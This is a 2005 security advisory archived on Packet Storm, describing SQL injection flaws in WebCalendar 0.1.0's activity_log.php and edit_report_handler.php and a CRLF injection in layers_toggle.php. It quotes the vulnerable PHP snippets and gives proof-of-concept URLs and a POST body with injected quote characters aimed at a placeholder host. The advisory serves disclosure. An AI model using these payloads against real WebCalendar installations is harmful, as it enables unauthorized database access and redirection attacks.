exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

webCalSQL.txt

webCalSQL.txt
Posted Dec 2, 2005
Authored by lwang

WebCalendar version 0.1.0 is susceptible to SQL injection attacks via activity_log.php and edit_report_handler.php. layers_toggle.php is susceptible to CRLF injection. Exploitation details provided.

tags | exploit, php, sql injection
SHA-256 | a301911fe8f5e2b56d3446fb741963f4c821df654703f5e31403ffbb7cebdaef
Download | Favorite | View

webCalSQL.txt

Change Mirror Download
WebCalendar Multiple Vulnerabilities.

Author: lwang (lwang at lwang.org)

Publish Date: 2005-12-1

Description:
WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes.  
In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php are prone to SQL Injection attack, layers_toggle.php is vulnerable to CRLF Injection.

Reference: 
http://vd.lwang.org/webcalendar_multiple_vulns.txt

Vulnerability Analysis and Proof of Concept:
1. SQL Injection
  in activity_log.php, parameter $startid does not validation.
  if ( ! empty ( $startid ) )
  $sql .= "AND webcal_entry_log.cal_log_id <= $startid ";
  PoC:
  http://victimhost/webcalendar/activity_log.php?startid=%2527
  http://victimhost/webcalendar/activity_log.php?startid=%27
  http://victimhost/webcalendar/activity_log.php?startid='
  
  in edit_report_handler.php
  PoC:
  POST the following variable to http://victimhost/webcalendar/edit_report_handler.php
  report_name=Unnamed%20Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=%26lt%3Bdl%26gt%3B%24%7Bdays%7D%26lt%3B%2Fdl%26gt%3B&day_template=%26lt%3Bdt%26gt%3B%26lt%3Bb%26gt%3B%24%7Bdate%7D%26lt%3B%2Fb%26gt%3B%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bdl%26gt%3B%24%7Bevents%7D%26lt%3B%2Fdl%26gt%3B%26lt%3B%2Fdd%26gt%3B&event_template=%26lt%3Bdt%26gt%3B%24%7Bname%7D%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bb%26gt%3BDate%3A%26lt%3B%2Fb%26gt%3B%20%24%7Bdate%7D%26lt%3Bbr%20%2F%26gt%3B%0A%26lt%3Bb%26gt%3BTime%3A%26lt%3B%2Fb%26gt%3B%20%24%7Btime%7D%26lt%3Bbr%20%2F%26gt%3B%0A%24%7Bdescription%7D%26lt%3B%2Fdd%26gt%3B

2. CRLF Injection
  in layers_toggle.php, parameter $ret does not validation.
  if ( empty ( $error ) ) {
  // Go back to where we where if we can figure it out.
  if ( strlen ( $ret ) )
  do_redirect ( $ret );
  else if ( ! empty ( $HTTP_REFERER ) )
  do_redirect ( $HTTP_REFERER );
  else
  send_to_preferred_view ();
  
  PoC:
  http://victimhost/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close